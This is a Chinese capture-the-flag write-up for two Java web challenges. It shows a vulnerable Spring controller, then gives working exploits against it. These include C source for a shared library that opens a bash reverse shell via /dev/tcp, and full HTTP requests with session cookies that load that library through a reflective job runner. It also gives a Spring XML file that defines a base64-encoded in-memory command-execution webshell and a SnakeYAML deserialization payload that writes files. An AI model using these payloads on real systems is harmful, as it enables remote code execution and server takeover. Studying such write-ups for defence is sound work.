August 7, 2025

2025磐石初赛Web两道Java

web-java_ez

VulnController

public class VulnController {
    private static Map<String, ScheduledJob> jobs = new HashMap();
    private static final String[] JOB_BLACKLIST = {"java.net.URL", "javax.naming.InitialContext", "org.yaml.snakeyaml", "org.springframework", "org.apache", "rmi", "ldap", "ldaps", "http", "https"};
    private static final String[] JOB_WHITELIST = {"com.jabaez.FLAG"};

    @GetMapping({"/server"})
    public Map<String, Object> getServerInfo() {
        Map<String, Object> info = new HashMap<>();
        info.put("javaHome", System.getProperty("java.home"));
        info.put("javaVersion", System.getProperty("java.version"));
        info.put("osName", System.getProperty("os.name"));
        info.put("userDir", System.getProperty("user.dir"));
        info.put("uploadDir", "/tmp/upload");
        Charset gbk = Charset.forName("GBK");
        byte[] bytes = gbk.encode("你好").array();
        System.out.println(Arrays.toString(bytes));
        return info;
    }

    @PostMapping({"/upload"})
    public Map<String, String> uploadFile(@RequestParam("file") MultipartFile file) {
        String originalFilename;
        Map<String, String> result = new HashMap<>();
        try {
            File dir = new File("/tmp/upload");
            if (!dir.exists()) {
                dir.mkdirs();
            }
            originalFilename = file.getOriginalFilename();
        } catch (Exception e) {
            result.put(BindTag.STATUS_VARIABLE_NAME, "error");
            result.put("message", e.getMessage());
        }
        if (originalFilename == null) {
            result.put(BindTag.STATUS_VARIABLE_NAME, "error");
            result.put("message", "文件名为空");
            return result;
        }
        String filename = new File(originalFilename).getName();
        if (filename.contains(CallerDataConverter.DEFAULT_RANGE_DELIMITER) || filename.contains("/") || filename.contains("\\") || filename.startsWith(".")) {
            result.put(BindTag.STATUS_VARIABLE_NAME, "error");
            result.put("message", "非法文件名");
            return result;
        }
        File dest = new File("/tmp/upload" + filename);
        String uploadPathCanonical = new File("/tmp/upload").getCanonicalPath();
        String destCanonical = dest.getCanonicalPath();
        if (!destCanonical.startsWith(uploadPathCanonical + File.separator)) {
            result.put(BindTag.STATUS_VARIABLE_NAME, "error");
            result.put("message", "非法文件路径");
            return result;
        }
        file.transferTo(dest);
        result.put(BindTag.STATUS_VARIABLE_NAME, "success");
        result.put("path", dest.getAbsolutePath());
        result.put("message", "文件上传成功");
        return result;
    }

    @PostMapping({"/job/add"})
    public Map<String, Object> addJob(@RequestBody ScheduledJob job) {
        Map<String, Object> result = new HashMap<>();
        if (containsBlacklist(job.getInvokeTarget())) {
            result.put(BindTag.STATUS_VARIABLE_NAME, "error");
            result.put("message", "包含非法字符");
            return result;
        }
        if (!containsWhitelist(job.getInvokeTarget())) {
            result.put(BindTag.STATUS_VARIABLE_NAME, "error");
            result.put("message", "目标不在白名单中");
            return result;
        }
        jobs.put(job.getJobName(), job);
        result.put(BindTag.STATUS_VARIABLE_NAME, "success");
        result.put("message", "任务添加成功");
        result.put("jobId", job.getJobName());
        return result;
    }

    @PostMapping({"/job/run/{jobName}"})
    public Map<String, Object> runJob(@PathVariable String jobName) {
        Map<String, Object> result = new HashMap<>();
        ScheduledJob job = jobs.get(jobName);
        if (job == null) {
            result.put(BindTag.STATUS_VARIABLE_NAME, "error");
            result.put("message", "任务不存在");
            return result;
        }
        try {
            invokeMethod(job.getInvokeTarget());
            result.put(BindTag.STATUS_VARIABLE_NAME, "success");
            result.put("message", "任务执行成功");
        } catch (Exception e) {
            result.put(BindTag.STATUS_VARIABLE_NAME, "error");
            result.put("message", e.getMessage());
            result.put("stackTrace", e.getStackTrace()[0].toString());
        }
        return result;
    }

    private boolean containsBlacklist(String str) {
        if (str == null) {
            return false;
        }
        String lowerStr = str.toLowerCase();
        for (String blackItem : JOB_BLACKLIST) {
            if (lowerStr.contains(blackItem.toLowerCase())) {
                return true;
            }
        }
        return false;
    }

    private boolean containsWhitelist(String str) {
        if (str == null) {
            return false;
        }
        for (String whiteItem : JOB_WHITELIST) {
            if (str.contains(whiteItem)) {
                return true;
            }
        }
        return false;
    }

    private Object invokeMethod(String invokeTarget) throws Exception {
        int hashIndex = invokeTarget.indexOf(35);
        if (hashIndex == -1) {
            throw new IllegalArgumentException("Invalid format, expected: className#methodName(params)");
        }
        String className = invokeTarget.substring(0, hashIndex);
        String methodAndParams = invokeTarget.substring(hashIndex + 1);
        int paramStart = methodAndParams.indexOf(40);
        int paramEnd = methodAndParams.lastIndexOf(41);
        if (paramStart != -1 && paramEnd != -1) {
            String methodName = methodAndParams.substring(0, paramStart);
            String paramStr = methodAndParams.substring(paramStart + 1, paramEnd);
            Class<?> clazz = Class.forName(className);
            List<Object> paramValues = new ArrayList<>();
            List<Class<?>> paramTypes = new ArrayList<>();
            if (!paramStr.trim().isEmpty()) {
                String[] params = splitParams(paramStr);
                for (String str : params) {
                    String param = str.trim();
                    if (param.startsWith("'") && param.endsWith("'")) {
                        String value = param.substring(1, param.length() - 1);
                        paramValues.add(value);
                        paramTypes.add(String.class);
                    } else if (param.equals(BeanDefinitionParserDelegate.NULL_ELEMENT)) {
                        paramValues.add(null);
                        paramTypes.add(String.class);
                    } else if (param.matches("\\d+")) {
                        paramValues.add(Integer.valueOf(Integer.parseInt(param)));
                        paramTypes.add(Integer.TYPE);
                    } else if (!param.equals("true") && !param.equals("false")) {
                        paramValues.add(param);
                        paramTypes.add(String.class);
                    } else {
                        paramValues.add(Boolean.valueOf(Boolean.parseBoolean(param)));
                        paramTypes.add(Boolean.TYPE);
                    }
                }
            }
            try {
                Method method = clazz.getMethod(methodName, (Class[]) paramTypes.toArray(new Class[0]));
                if (Modifier.isStatic(method.getModifiers())) {
                    return method.invoke(null, paramValues.toArray());
                }
                Object instance = clazz.newInstance();
                return method.invoke(instance, paramValues.toArray());
            } catch (NoSuchMethodException e) {
                Method method2 = clazz.getDeclaredMethod(methodName, (Class[]) paramTypes.toArray(new Class[0]));
                method2.setAccessible(true);
                if (Modifier.isStatic(method2.getModifiers())) {
                    return method2.invoke(null, paramValues.toArray());
                }
                Object instance2 = clazz.newInstance();
                return method2.invoke(instance2, paramValues.toArray());
            }
        }
        throw new IllegalArgumentException("Invalid method format");
    }

    private String[] splitParams(String paramStr) {
        List<String> params = new ArrayList<>();
        int bracketLevel = 0;
        int start = 0;
        for (int i = 0; i < paramStr.length(); i++) {
            char c = paramStr.charAt(i);
            if (c != '(' && c != '{' && c != '[') {
                if (c == ')' || c == '}' || c == ']') {
                    bracketLevel--;
                } else if (c == ',' && bracketLevel == 0) {
                    params.add(paramStr.substring(start, i));
                    start = i + 1;
                }
            } else {
                bracketLevel++;
            }
        }
        if (start < paramStr.length()) {
            params.add(paramStr.substring(start));
        }
        return (String[]) params.toArray(new String[0]);
    }

    /* loaded from: jaba-ez.jar:BOOT-INF/classes/com/jabaez/VulnController$ScheduledJob.class */
    static class ScheduledJob {
        private String jobName;
        private String invokeTarget;
        private String cronExpression;

        ScheduledJob() {
        }

        public String getJobName() {
            return this.jobName;
        }

        public void setJobName(String jobName) {
            this.jobName = jobName;
        }

        public String getInvokeTarget() {
            return this.invokeTarget;
        }

        public void setInvokeTarget(String invokeTarget) {
            this.invokeTarget = invokeTarget;
        }

        public String getCronExpression() {
            return this.cronExpression;
        }

        public void setCronExpression(String cronExpression) {
            this.cronExpression = cronExpression;
        }
    }
}

可以上传任意文件到/tmp/upload，可以写任务并且执行任务时可以调用任意方法

注意这里的白名单和黑名单

1
2
3

private static final String[] JOB_BLACKLIST = {"java.net.URL", "javax.naming.InitialContext", "org.yaml.snakeyaml", "org.springframework", "org.apache", "rmi", "ldap", "ldaps", "http", "https"};
private static final String[] JOB_WHITELIST = {"com.jabaez.FLAG"};

看起来限制的很死，但是我们可以参考若依4.8计划任务RCE

编译上传so文件

#include <stdio.h>
#include <unistd.h>
#include <stdlib.h>
__attribute__ ((constructor)) void angel(void) {
    system("bash -c 'bash -i >& /dev/tcp/ip/port 0>&1'");
}

写任务时加载

POST /api/job/add HTTP/1.1
Host: pss.idss-cn.com:22313
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Pragma: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: rt_web__jwt_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZGRjZGIzZGVmNWFjYzhiZGYzOGUxYWFlZTA2ZjQ0OWIiLCJ1c2VybmFtZSI6ImRpbmdndWFuaGUiLCJleHAiOjE3NTQ1MzkxNDEsImVtYWlsIjoiMTA1MTM3Mzc4N0BxcS5jb20ifQ.GKWAhdC5mzMk84NtomZw3uuIjdAM70zheBUy469BgCI; rt_web_csrf_token=6BwsSY8NNkNzvKhCpJOLtLiDck38bmqZeq7Yovs99z56liUedfKpdWPGU80ORBEJ
Cache-Control: no-cache
Content-Type: application/json

{
   "jobName" : "aa3",
   "invokeTarget" : "java.lang.System#load('/tmp/uploads/com.jabaez.FLAG.so')"
}

执行任务

POST /api/job/run/aa3 HTTP/1.1
Host: pss.idss-cn.com:22313
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36
Pragma: no-cache
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: rt_web__jwt_token=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJ1c2VyX2lkIjoiZGRjZGIzZGVmNWFjYzhiZGYzOGUxYWFlZTA2ZjQ0OWIiLCJ1c2VybmFtZSI6ImRpbmdndWFuaGUiLCJleHAiOjE3NTQ1MzkxNDEsImVtYWlsIjoiMTA1MTM3Mzc4N0BxcS5jb20ifQ.GKWAhdC5mzMk84NtomZw3uuIjdAM70zheBUy469BgCI; rt_web_csrf_token=6BwsSY8NNkNzvKhCpJOLtLiDck38bmqZeq7Yovs99z56liUedfKpdWPGU80ORBEJ
Cache-Control: no-cache
Content-Type: application/json

反弹shell

ezyaml

SnakeYaml反序列化

这里的黑名单加上不出网限制了打不了JNDI，同时也无法加载远程类

参考java反序列化之SnakeYaml，可以写jar包，但问题是无法加载，所以这题当时就没出

第二天突然看到从 SnakeYaml 看 ClassPathXmlApplicationContext 不出网利用，想起来P牛之前写过的一篇文章ClassPathXmlApplicationContext的不出网利用

既然我们已经可以写入任意文件了，那么也就可以通过加载XML去执行命令，题目过滤了ClassPath自然也就用不了ClassPathXmlApplicationContext，但是还可以利用FileSystemXmlApplicationContext

我们就可以构造出payload，首先写一个xml，这个xml可以用javachains写一个回显马

<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="http://www.springframework.org/schema/beans
                           http://www.springframework.org/schema/beans/spring-beans.xsd">
    <bean id="decoder" class="org.springframework.beans.factory.config.MethodInvokingFactoryBean">
        <property name="staticMethod" value="javax.xml.bind.DatatypeConverter.parseBase64Binary"/>
        <property name="arguments">
            <list>
                <value>yv66vgAAADIBOwEAZm9yZy9hcGFjaGUvY29tbW9tcy9iZWFudXRpbHMvY295b3RlL2Rlc2VyaWFsaXphdGlvbi9WYWx1ZUluc3RhbnRpYXRvcnNkM2Y5MzlmMjA1ZjM0Mzk0ODA3M2UwMmQwMzlkNzhkYQcAAQEAEGphdmEvbGFuZy9PYmplY3QHAAMBAAY8aW5pdD4BAAMoKVYBABNqYXZhL2xhbmcvRXhjZXB0aW9uBwAHDAAFAAYKAAQACQEAA3J1bgwACwAGCgACAAwBABBnZXRSZXFIZWFkZXJOYW1lAQAUKClMamF2YS9sYW5nL1N0cmluZzsBAANjbWQIABABAB5qYXZhL2xhbmcvTm9TdWNoRmllbGRFeGNlcHRpb24HABIBABNqYXZhL2xhbmcvVGhyb3dhYmxlBwAUAQAQamF2YS9sYW5nL1RocmVhZAcAFgEACmdldFRocmVhZHMIABgBAA9qYXZhL2xhbmcvQ2xhc3MHABoBABJbTGphdmEvbGFuZy9DbGFzczsHABwBABFnZXREZWNsYXJlZE1ldGhvZAEAQChMamF2YS9sYW5nL1N0cmluZztbTGphdmEvbGFuZy9DbGFzczspTGphdmEvbGFuZy9yZWZsZWN0L01ldGhvZDsMAB4AHwoAGwAgAQAYamF2YS9sYW5nL3JlZmxlY3QvTWV0aG9kBwAiAQANc2V0QWNjZXNzaWJsZQEABChaKVYMACQAJQoAIwAmAQAGaW52b2tlAQA5KExqYXZhL2xhbmcvT2JqZWN0O1tMamF2YS9sYW5nL09iamVjdDspTGphdmEvbGFuZy9PYmplY3Q7DAAoACkKACMAKgEAE1tMamF2YS9sYW5nL1RocmVhZDsHACwBAAdnZXROYW1lDAAuAA8KABcALwEABGh0dHAIADEBABBqYXZhL2xhbmcvU3RyaW5nBwAzAQAIY29udGFpbnMBABsoTGphdmEvbGFuZy9DaGFyU2VxdWVuY2U7KVoMADUANgoANAA3AQAIQWNjZXB0b3IIADkBAAhnZXRDbGFzcwEAEygpTGphdmEvbGFuZy9DbGFzczsMADsAPAoABAA9AQAGdGFyZ2V0CAA/AQAQZ2V0RGVjbGFyZWRGaWVsZAEALShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9yZWZsZWN0L0ZpZWxkOwwAQQBCCgAbAEMBABdqYXZhL2xhbmcvcmVmbGVjdC9GaWVsZAcARQoARgAmAQADZ2V0AQAmKExqYXZhL2xhbmcvT2JqZWN0OylMamF2YS9sYW5nL09iamVjdDsMAEgASQoARgBKAQAIZW5kcG9pbnQIAEwBAAZ0aGlzJDAIAE4BAAdoYW5kbGVyCABQAQANZ2V0U3VwZXJjbGFzcwwAUgA8CgAbAFMBAAZnbG9iYWwIAFUBAA5nZXRDbGFzc0xvYWRlcgEAGSgpTGphdmEvbGFuZy9DbGFzc0xvYWRlcjsMAFcAWAoAGwBZAQAib3JnLmFwYWNoZS5jb3lvdGUuUmVxdWVzdEdyb3VwSW5mbwgAWwEAFWphdmEvbGFuZy9DbGFzc0xvYWRlcgcAXQEACWxvYWRDbGFzcwEAJShMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9DbGFzczsMAF8AYAoAXgBhCgAbAC8BAApwcm9jZXNzb3JzCABkAQATamF2YS91dGlsL0FycmF5TGlzdAcAZgEABHNpemUBAAMoKUkMAGgAaQoAZwBqAQAVKEkpTGphdmEvbGFuZy9PYmplY3Q7DABIAGwKAGcAbQEAA3JlcQgAbwEAB2dldE5vdGUIAHEBABFqYXZhL2xhbmcvSW50ZWdlcgcAcwEABFRZUEUBABFMamF2YS9sYW5nL0NsYXNzOwwAdQB2CQB0AHcBAAd2YWx1ZU9mAQAWKEkpTGphdmEvbGFuZy9JbnRlZ2VyOwwAeQB6CgB0AHsBAAlnZXRIZWFkZXIIAH0BAAlnZXRNZXRob2QMAH8AHwoAGwCADAAOAA8KAAIAggEAC2dldFJlc3BvbnNlCACEAQAJZ2V0V3JpdGVyCACGAQAOamF2YS9pby9Xcml0ZXIHAIgBAAZoYW5kbGUBACYoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL2xhbmcvU3RyaW5nOwwAigCLCgACAIwBAAV3cml0ZQEAFShMamF2YS9sYW5nL1N0cmluZzspVgwAjgCPCgCJAJABAAVmbHVzaAwAkgAGCgCJAJMBAAVjbG9zZQwAlQAGCgCJAJYBAARleGVjAQAHb3MubmFtZQgAmQEAEGphdmEvbGFuZy9TeXN0ZW0HAJsBAAtnZXRQcm9wZXJ0eQwAnQCLCgCcAJ4BAAt0b0xvd2VyQ2FzZQwAoAAPCgA0AKEBAAN3aW4IAKMBAAcvYmluL3NoCAClAQACLWMIAKcBAAdjbWQuZXhlCACpAQACL2MIAKsBABFqYXZhL2xhbmcvUnVudGltZQcArQEACmdldFJ1bnRpbWUBABUoKUxqYXZhL2xhbmcvUnVudGltZTsMAK8AsAoArgCxAQAoKFtMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwwAmACzCgCuALQBABFqYXZhL2xhbmcvUHJvY2VzcwcAtgEADmdldElucHV0U3RyZWFtAQAXKClMamF2YS9pby9JbnB1dFN0cmVhbTsMALgAuQoAtwC6AQARamF2YS91dGlsL1NjYW5uZXIHALwBABgoTGphdmEvaW8vSW5wdXRTdHJlYW07KVYMAAUAvgoAvQC/AQACXGEIAMEBAAx1c2VEZWxpbWl0ZXIBACcoTGphdmEvbGFuZy9TdHJpbmc7KUxqYXZhL3V0aWwvU2Nhbm5lcjsMAMMAxAoAvQDFAQAACADHAQAHaGFzTmV4dAEAAygpWgwAyQDKCgC9AMsBABdqYXZhL2xhbmcvU3RyaW5nQnVpbGRlcgcAzQoAzgAJAQAGYXBwZW5kAQAtKExqYXZhL2xhbmcvU3RyaW5nOylMamF2YS9sYW5nL1N0cmluZ0J1aWxkZXI7DADQANEKAM4A0gEABG5leHQMANQADwoAvQDVAQAIdG9TdHJpbmcMANcADwoAzgDYAQAKZ2V0TWVzc2FnZQwA2gAPCgAIANsBABNbTGphdmEvbGFuZy9TdHJpbmc7BwDdAQATamF2YS9pby9JbnB1dFN0cmVhbQcA3wEABmV5SmVYQQgA4QEACnN0YXJ0c1dpdGgBABUoTGphdmEvbGFuZy9TdHJpbmc7KVoMAOMA5AoANADlAQAGbGVuZ3RoDADnAGkKADQA6AEABmNoYXJBdAEABChJKUMMAOoA6woANADsAQAVKEMpTGphdmEvbGFuZy9TdHJpbmc7DAB5AO4KADQA7wEACHBhcnNlSW50AQAVKExqYXZhL2xhbmcvU3RyaW5nOylJDADxAPIKAHQA8wEAAS4IAPUBAAdpbmRleE9mDAD3APIKADQA+AEACXN1YnN0cmluZwEAFihJSSlMamF2YS9sYW5nL1N0cmluZzsM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</value>

            </list>

        </property>

    </bean>

    <bean id="classLoader" class="javax.management.loading.MLet"/>
    <bean id="clazz" factory-bean="classLoader" factory-method="defineClass">
        <constructor-arg ref="decoder"/>
        <constructor-arg type="int" value="0"/>
        <constructor-arg type="int" value="5129"/>
    </bean>

    <bean factory-bean="clazz" factory-method="newInstance"/>
</beans>

!!sun.rmi.server.MarshalOutputStream [!!java.util.zip.InflaterOutputStream [!!java.io.FileOutputStream [!!java.io.File ["./poc.xml"],false],!!java.util.zip.Inflater  { input: !!binary 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